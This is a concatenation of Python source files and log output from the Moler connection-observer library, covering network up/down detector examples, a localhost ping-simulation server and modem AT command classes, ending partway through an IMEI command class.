15:28:32 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms
15:28:32 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-7 |Network 10.0.2.16 is up!
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed done & unsubscribing NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |END OF feed(NetworkUpDetector(id:7f521a0e2ba8))
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed returning result: 1541514512.3170855
15:28:32 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed done & unsubscribing NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |END OF feed(NetworkUpDetector(id:7f521a0d6860))
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed returning result: 1541514512.3174996
15:28:32 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-3 |NetworkUpDetector(id:7f521a0e2ba8) returned 1541514512.3170855
15:28:32 |moler.user.app-code | Thread-3 |Network 10.0.2.15 is back "up" from 15:28:32
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |NetworkUpDetector(id:7f521a0d6860) returned 1541514512.3174996
15:28:32 |moler.user.app-code | Thread-4 |Network 10.0.2.16 is back "up" from 15:28:32
15:28:32 |moler.user.app-code | Thread-3 |exiting ping_observing_task(10.0.2.15)
15:28:32 |moler.user.app-code | Thread-4 |exiting ping_observing_task(10.0.2.16)
15:28:32 |asyncio.main | MainThread |all jobs observing connections are done
15:28:32 |threaded.ping.tcp-server(5671) | Thread-1 |Ping Sim: ... bye
15:28:32 |threaded.ping.tcp-server(5672) | Thread-2 |Ping Sim: ... bye
15:28:32 |asyncio | Thread-5 |poll took 255.669 ms: 1 events
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |... await stop_event done
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |... asyncio-in-thrd loop done
15:28:34 |threaded.ping.tcp-server(5672 -> 43373) | Thread-6 |Connection closed
15:28:34 |threaded.ping.tcp-server(5671 -> 49571) | Thread-8 |Connection closed
15:28:34 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Dummy-10 |shutting down
15:28:34 |asyncio | Dummy-10 |Close <_UnixSelectorEventLoop running=False closed=False debug=True>
'''
```
#### File: layer_3/threaded/network_down_detectors_on_tcp_conn_v3.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import os
import threading
import time
from moler.threaded_moler_connection import ThreadedMolerConnection
from moler.io.raw import tcp
from moler.connection_factory import get_connection, ConnectionFactory
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) # allow finding modules in examples/
from network_toggle_observers import NetworkDownDetector, NetworkUpDetector
# ===================== Moler's connection-observer usage ======================
def ping_observing_task(ext_io_connection, ping_ip):
"""
Here the external-IO connection is abstract - we don't know its type.
All we know is that it has a .moler_connection attribute.
"""
logger = logging.getLogger('moler.user.app-code')
conn_addr = str(ext_io_connection)
# Layer 2 of Moler's usage (ext_io_connection + runner):
# 3. create observers on Moler's connection
net_down_detector = NetworkDownDetector(ping_ip)
net_down_detector.connection = ext_io_connection.moler_connection
net_up_detector = NetworkUpDetector(ping_ip)
net_up_detector.connection = ext_io_connection.moler_connection
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_down_detector)
logger.debug('observe ' + info)
# 4. start observer (nonblocking, using as future)
net_down_detector.start() # should be started before we open connection
# to not lose the first data on the connection
with ext_io_connection.open():
# 5. await that observer to complete
net_down_time = net_down_detector.await_done(timeout=10)
timestamp = time.strftime("%H:%M:%S", time.localtime(net_down_time))
logger.debug('Network {} is down from {}'.format(ping_ip, timestamp))
# 6. call next observer (blocking till completes)
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_up_detector)
logger.debug('observe ' + info)
# using as synchronous function (so we want verb to express action)
detect_network_up = net_up_detector
net_up_time = detect_network_up()
timestamp = time.strftime("%H:%M:%S", time.localtime(net_up_time))
logger.debug('Network {} is back "up" from {}'.format(ping_ip, timestamp))
# ==============================================================================
def main(connections2observe4ip):
# Starting the clients
connections = []
for address, ping_ip in connections2observe4ip:
host, port = address
# ------------------------------------------------------------------
# This front-end code hides the parallelism variant
# used to read data from the connection.
# We don't care whether it is a TCP connection based on threads or asyncio.
# All we want here is "any TCP connection towards the given host/port".
# "any" here means: the TCP variant configured on the backend.
# ------------------------------------------------------------------
tcp_connection = get_connection(io_type='tcp', host=host, port=port)
client_thread = threading.Thread(target=ping_observing_task,
args=(tcp_connection, ping_ip))
client_thread.start()
connections.append(client_thread)
# wait for the observers' jobs to be done
for client_thread in connections:
client_thread.join()
# ==============================================================================
if __name__ == '__main__':
from threaded_ping_server import start_ping_servers, stop_ping_servers
import os
from moler.config import load_config
# -------------------------------------------------------------------
# Configure moler connections (backend code)
# ver.3 - configure by YAML config file
load_config(config=os.path.join(os.path.dirname(__file__), "..", "connections_new_variant.yml"))
# configure the class used to realize the tcp-threaded connection
# (the default one, tcp.ThreadedTcp, has no logger)
# This constitutes a plugin system - you can exchange the connection implementation
def tcp_thd_conn(port, host='localhost', name=None):
moler_conn = ThreadedMolerConnection(decoder=lambda data: data.decode("utf-8"))
conn_logger_name = 'threaded.tcp-connection({}:{})'.format(host, port)
conn_logger = logging.getLogger(conn_logger_name)
io_conn = tcp.ThreadedTcp(moler_connection=moler_conn,
port=port, host=host, logger=conn_logger)
return io_conn
ConnectionFactory.register_construction(io_type="tcp",
variant="threaded-and-logged",
constructor=tcp_thd_conn)
# -------------------------------------------------------------------
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-40s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
connections2observe4ip = [(('localhost', 5671), '10.0.2.15'),
(('localhost', 5672), '10.0.2.16')]
servers = start_ping_servers(connections2observe4ip)
main(connections2observe4ip)
stop_ping_servers(servers)
'''
LOG OUTPUT
15:45:31 |threaded.ping.tcp-server(5671) |Ping Sim started at tcp://localhost:5671
15:45:31 |threaded.ping.tcp-server(5672) |Ping Sim started at tcp://localhost:5672
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35320>
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35710>
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E357F0>
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.user.app-code |observe 10.0.2.15 on tcp://localhost:5671 using NetworkDownDetector(id:2e35240)
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35B00>
15:45:31 |moler.runner.thread-pool |go background: NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:31 |moler.user.app-code |observe 10.0.2.16 on tcp://localhost:5672 using NetworkDownDetector(id:2e356d8)
15:45:31 |moler.runner.thread-pool |subscribing for data NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:31 |moler.runner.thread-pool |go background: NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:31 |moler.runner.thread-pool |subscribing for data NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:31 |threaded.tcp-connection(localhost:5671) |connecting to tcp://localhost:5671
15:45:31 |threaded.tcp-connection(localhost:5672) |connecting to tcp://localhost:5672
15:45:31 |threaded.tcp-connection(localhost:5671) |connection tcp://localhost:5671 is open
15:45:31 |moler.runner.thread-pool |go foreground: NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>]) - await max. 10 [sec]
15:45:31 |threaded.tcp-connection(localhost:5672) |connection tcp://localhost:5672 is open
15:45:31 |threaded.ping.tcp-server(5671 -> 55946) |connection accepted - client at tcp://127.0.0.1:55946
15:45:31 |threaded.ping.tcp-server(5672 -> 55947) |connection accepted - client at tcp://127.0.0.1:55947
15:45:31 |moler.runner.thread-pool |go foreground: NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>]) - await max. 10 [sec]
15:45:31 |threaded.tcp-connection(localhost:5671) |< b'\n'
15:45:31 |moler.connection.2df4f28 |
15:45:31 |threaded.tcp-connection(localhost:5672) |< b'\n'
15:45:31 |moler.connection.2e35400 |
15:45:32 |threaded.tcp-connection(localhost:5672) |< b'greg@debian:~$ ping 10.0.2.16\n'
15:45:32 |moler.connection.2e35400 |greg@debian:~$ ping 10.0.2.16
15:45:32 |threaded.tcp-connection(localhost:5671) |< b'greg@debian:~$ ping 10.0.2.15\n'
15:45:32 |moler.connection.2df4f28 |greg@debian:~$ ping 10.0.2.15
15:45:33 |threaded.tcp-connection(localhost:5671) |< b'PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.\n'
15:45:33 |moler.connection.2df4f28 |PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
15:45:33 |threaded.tcp-connection(localhost:5672) |< b'PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.\n'
15:45:33 |moler.connection.2e35400 |PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.
15:45:34 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms\n'
15:45:34 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms
15:45:34 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms\n'
15:45:34 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
15:45:35 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms\n'
15:45:35 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
15:45:35 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms\n'
15:45:35 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms
15:45:36 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms\n'
15:45:36 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
15:45:36 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms\n'
15:45:36 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms
15:45:37 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:37 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:37 |moler.NetworkDownDetector(id:2e35240) |Network 10.0.2.15 is down!
15:45:37 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:37 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:37 |moler.NetworkDownDetector(id:2e356d8) |Network 10.0.2.16 is down!
15:45:37 |moler.runner.thread-pool |done & unsubscribing NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |returning result NetworkDownDetector(id:2e35240)
15:45:37 |moler.runner.thread-pool |done & unsubscribing NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |returning result NetworkDownDetector(id:2e356d8)
15:45:37 |moler.runner.thread-pool |shutting down
15:45:37 |moler.runner.thread-pool |shutting down
15:45:37 |moler.runner.thread-pool |NetworkDownDetector(id:2e35240) returned 1528983937.2623792
15:45:37 |moler.runner.thread-pool |NetworkDownDetector(id:2e356d8) returned 1528983937.263379
15:45:37 |moler.user.app-code |Network 10.0.2.15 is down from 15:45:37
15:45:37 |moler.user.app-code |observe 10.0.2.15 on tcp://localhost:5671 using NetworkUpDetector(id:2e35630)
15:45:37 |moler.user.app-code |Network 10.0.2.16 is down from 15:45:37
15:45:37 |moler.user.app-code |observe 10.0.2.16 on tcp://localhost:5672 using NetworkUpDetector(id:2e35978)
15:45:37 |moler.runner.thread-pool |go background: NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |subscribing for data NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |go background: NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |subscribing for data NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |go foreground: NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>]) - await max. None [sec]
15:45:37 |moler.runner.thread-pool |go foreground: NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>]) - await max. None [sec]
15:45:38 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:38 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:38 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:38 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:39 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:39 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:39 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:39 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:40 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms\n'
15:45:40 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
15:45:40 |moler.NetworkUpDetector(id:2e35630) |Network 10.0.2.15 is up!
15:45:40 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms\n'
15:45:40 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms
15:45:40 |moler.NetworkUpDetector(id:2e35978) |Network 10.0.2.16 is up!
15:45:40 |moler.runner.thread-pool |done & unsubscribing NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:40 |moler.runner.thread-pool |returning result NetworkUpDetector(id:2e35978)
15:45:40 |moler.runner.thread-pool |done & unsubscribing NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:40 |moler.runner.thread-pool |returning result NetworkUpDetector(id:2e35630)
15:45:40 |moler.runner.thread-pool |shutting down
15:45:40 |moler.runner.thread-pool |NetworkUpDetector(id:2e35978) returned 1528983940.2635787
15:45:40 |moler.user.app-code |Network 10.0.2.16 is back "up" from 15:45:40
15:45:40 |moler.runner.thread-pool |shutting down
15:45:40 |moler.runner.thread-pool |NetworkUpDetector(id:2e35630) returned 1528983940.2625787
15:45:40 |moler.user.app-code |Network 10.0.2.15 is back "up" from 15:45:40
15:45:40 |threaded.tcp-connection(localhost:5671) |connection tcp://localhost:5671 is closed
15:45:40 |threaded.tcp-connection(localhost:5672) |connection tcp://localhost:5672 is closed
15:45:40 |threaded.ping.tcp-server(5671) |Ping Sim: ... bye
15:45:40 |threaded.ping.tcp-server(5672) |Ping Sim: ... bye
15:45:42 |threaded.ping.tcp-server(5671 -> 55946) |Connection closed
15:45:42 |threaded.ping.tcp-server(5672 -> 55947) |Connection closed
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
'''
```
#### File: moler/examples/threaded_ping_server.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import select
import socket
import sys
import threading
import time
from contextlib import closing
ping_output = '''
greg@debian:~$ ping 10.0.2.15
PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
64 bytes from 10.0.2.15: icmp_req=8 ttl=64 time=0.056 ms
'''
def ping_sim_tcp_server(server_port, ping_ip, client, address):
_, client_port = address
logger = logging.getLogger('threaded.ping.tcp-server({} -> {})'.format(server_port,
client_port))
logger.debug('connection accepted - client at tcp://{}:{}'.format(*address))
ping_out = ping_output.replace("10.0.2.15", ping_ip)
ping_lines = ping_out.splitlines(True)
with closing(client):
for ping_line in ping_lines:
data = ping_line.encode(encoding='utf-8')
try:
client.sendall(data)
except socket.error: # client is gone
break
time.sleep(1) # simulate delay between ping lines
logger.info('Connection closed')
def server_loop(server_port, server_socket, ping_ip, done_event):
logger = logging.getLogger('threaded.ping.tcp-server({})'.format(server_port))
while not done_event.is_set():
# without select we can't break loop from outside (via done_event)
# since .accept() is blocking
read_sockets, _, _ = select.select([server_socket], [], [], 0.1)
if not read_sockets:
continue
client_socket, client_addr = server_socket.accept()
client_socket.setblocking(1)
client_thread = threading.Thread(target=ping_sim_tcp_server,
args=(server_port, ping_ip,
client_socket, client_addr))
client_thread.start()
logger.debug("Ping Sim: ... bye")
def start_ping_sim_server(server_address, ping_ip):
"""Run server simulating ping command output, this is one-shot server"""
_, server_port = server_address
logger = logging.getLogger('threaded.ping.tcp-server({})'.format(server_port))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(server_address)
server_socket.listen(1)
logger.debug("Ping Sim started at tcp://{}:{}".format(*server_address))
done_event = threading.Event()
server_thread = threading.Thread(target=server_loop,
args=(server_port, server_socket, ping_ip,
done_event))
server_thread.start()
return server_thread, done_event
def tcp_connection(address, moler_conn):
"""Forwarder reading from tcp network transport layer"""
logger = logging.getLogger('threaded.tcp-connection({}:{})'.format(*address))
logger.debug('... connecting to tcp://{}:{}'.format(*address))
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(address)
with closing(client_socket):
while True:
data = client_socket.recv(128)
if data:
logger.debug('<<< {!r}'.format(data))
# Forward received data into Moler's connection
moler_conn.data_received(data)
yield data
else:
logger.debug("... closed")
break
def start_ping_servers(servers_addr):
servers = []
for address, ping_ip in servers_addr:
# simulate pinging given IP
server_thread, server_done = start_ping_sim_server(address, ping_ip)
servers.append((server_thread, server_done))
return servers
def stop_ping_servers(servers):
for server_thread, server_done in servers:
server_done.set()
server_thread.join()
# ==============================================================================
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-40s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
connections2serve = [(('localhost', 5671), '10.0.2.15'),
(('localhost', 5672), '10.0.2.16')]
servers = start_ping_servers(connections2serve)
time.sleep(2)
stop_ping_servers(servers)
```
#### File: cmd/at/attach.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.at.genericat import GenericAtCommand
class Attach(GenericAtCommand):
"""
Command to trigger attach. Example output:
AT+CGATT=1
OK
"""
def __init__(self, connection=None, prompt=None, newline_chars=None, runner=None):
"""Create instance of Attach class"""
super(Attach, self).__init__(connection, operation="execute", prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.timeout = 180
self.ret_required = False
def build_command_string(self):
return "AT+CGATT=1"
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
AT+CGATT=1
OK
"""
COMMAND_KWARGS_ver_execute = {}
COMMAND_RESULT_ver_execute = {}
```
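The COMMAND_OUTPUT_/COMMAND_KWARGS_/COMMAND_RESULT_ triplets above follow the self-test convention described in the comment block. As a rough, illustrative sketch (not moler's actual CI harness), the snippet below shows how the suffix-based naming lets a test pair the samples up by introspection; the `collect_command_samples` helper is hypothetical.
```python
# Illustrative sketch only - moler's CI uses its own utilities; this just
# demonstrates how the naming convention groups samples by suffix.
import importlib


def collect_command_samples(module_name):
    """Group COMMAND_OUTPUT/KWARGS/RESULT attributes of a module by suffix."""
    module = importlib.import_module(module_name)
    samples = {}
    for attr_name in dir(module):
        for prefix in ("COMMAND_OUTPUT", "COMMAND_KWARGS", "COMMAND_RESULT"):
            if attr_name.startswith(prefix):
                suffix = attr_name[len(prefix):]  # e.g. "_ver_execute"
                samples.setdefault(suffix, {})[prefix] = getattr(module, attr_name)
    return samples


if __name__ == "__main__":
    for suffix, triplet in collect_command_samples("moler.cmd.at.attach").items():
        # each suffix should provide all three pieces: output, kwargs, result
        print(suffix, sorted(triplet))
```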
#### File: cmd/at/enable_echo.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020-2021, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.at.genericat import GenericAtCommand
class EnableEcho(GenericAtCommand):
"""
Command to enable echo. Example output:
ATE1
OK
"""
def __init__(self, connection=None, prompt=None, newline_chars=None, runner=None):
"""
:param connection: moler connection to device
        :param prompt: start prompt (on system where command starts)
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(EnableEcho, self).__init__(connection, operation="execute", prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.ret_required = False
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
return "ATE1"
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
ATE1
OK
"""
COMMAND_KWARGS_ver_execute = {}
COMMAND_RESULT_ver_execute = {}
```
#### File: cmd/at/genericat.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import re
import abc
import six
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
@six.add_metaclass(abc.ABCMeta)
class GenericAtCommand(CommandTextualGeneric):
_re_default_at_prompt = re.compile(r'^\s*(OK|NO CARRIER|ERROR|\+CM[ES]\s+ERROR:\s*\S.+)\s*$') # When user provides no prompt
def __init__(self, connection, operation="execute", prompt=None, newline_chars=None, runner=None):
"""
Create instance of At class - base class for all AT commands
:param connection: connection used to send command and receive its output
:param operation: "execute", "read", "test" (not all AT commands support all modes)
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
"""
if prompt is None:
prompt = self._re_default_at_prompt
self.operation = operation # for 'read' command ends with '?', for 'test' ends with '=?'
super(GenericAtCommand, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
if operation not in ["execute", "read", "test"]:
raise CommandFailure(self, "{} mode not supported".format(operation))
# TODO: do we have any way to stop AT cmd?
self.terminating_timeout = 0 # no additional timeout for Ctrl-C..till..prompt (shutdown after cmd timeout)
def on_new_line(self, line, is_full_line):
"""
Method to parse command output. Will be called after line with command echo.
Write your own implementation but don't forget to call on_new_line from base class
:param line: Line to parse, new lines are trimmed
:param is_full_line: False for chunk of line; True on full line (NOTE: new line character removed)
:return: None
"""
if is_full_line:
try:
self._parse_error_response(line)
except ParsingDone:
pass
return super(GenericAtCommand, self).on_new_line(line, is_full_line)
def _is_at_cmd_echo(self, line):
return self._regex_helper.search_compiled(self._cmd_escaped, line)
_re_error = re.compile(r'^\s*(ERROR|NO CARRIER)\s*$')
_re_cme_error = re.compile(r'^\+(?P<ERR_TYPE>CM[ES])\s+ERROR:\s*(?P<ERROR>\S.+)', flags=re.IGNORECASE)
def _parse_error_response(self, line):
"""
When command itself is invalid or cannot be performed for some reason,
or mobile termination error reporting is disabled:
at+cmd
ERROR
When command was not processed due to an error related to MT operation:
at+cmd
+CME ERROR: result code
See https://www.smssolutions.net/tutorials/gsm/gsmerrorcodes/
"""
if self._regex_helper.match_compiled(self._re_cme_error, line):
error_type = self._regex_helper.group("ERR_TYPE")
error_info = self._regex_helper.group("ERROR")
self.set_exception(CommandFailure(self, "{} ERROR: {}".format(error_type, error_info)))
raise ParsingDone
elif self._regex_helper.match_compiled(self._re_error, line):
error_info = self._regex_helper.group(1)
self.set_exception(CommandFailure(self, error_info))
raise ParsingDone
```
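For a quick feel of the error detection in `_parse_error_response`, the standalone snippet below (plain `re`, no moler objects) runs the same two patterns against typical modem replies; the sample lines are illustrative.
```python
import re

# Same patterns as GenericAtCommand._re_error / _re_cme_error above.
_re_error = re.compile(r'^\s*(ERROR|NO CARRIER)\s*$')
_re_cme_error = re.compile(r'^\+(?P<ERR_TYPE>CM[ES])\s+ERROR:\s*(?P<ERROR>\S.+)', flags=re.IGNORECASE)

for line in ("OK", "ERROR", "NO CARRIER", "+CME ERROR: SIM not inserted"):
    cme = _re_cme_error.match(line)
    if cme:
        print("{!r}: {} failure -> {}".format(line, cme.group("ERR_TYPE"), cme.group("ERROR")))
    elif _re_error.match(line):
        print("{!r}: plain failure".format(line))
    else:
        print("{!r}: not an error line".format(line))
```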
#### File: cmd/at/get_imei.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.at.genericat import GenericAtCommand
from moler.exceptions import ParsingDone
class GetImei(GenericAtCommand):
"""
Command to get product serial number identification. Example output:
AT+CGSN
490154203237518
AT+CGSN=1
+CGSN: "490154203237518"
OK
"""
def __init__(self, connection=None, sn_type="default", prompt=None, newline_chars=None, runner=None):
"""
Create instance of GetImei class
See 3gpp documentation for SN type values:
<snt>: integer type indicating the serial number type that has been requested.
0 returns <sn> Serial Number as defined by manufacturer, typically it is IMEI
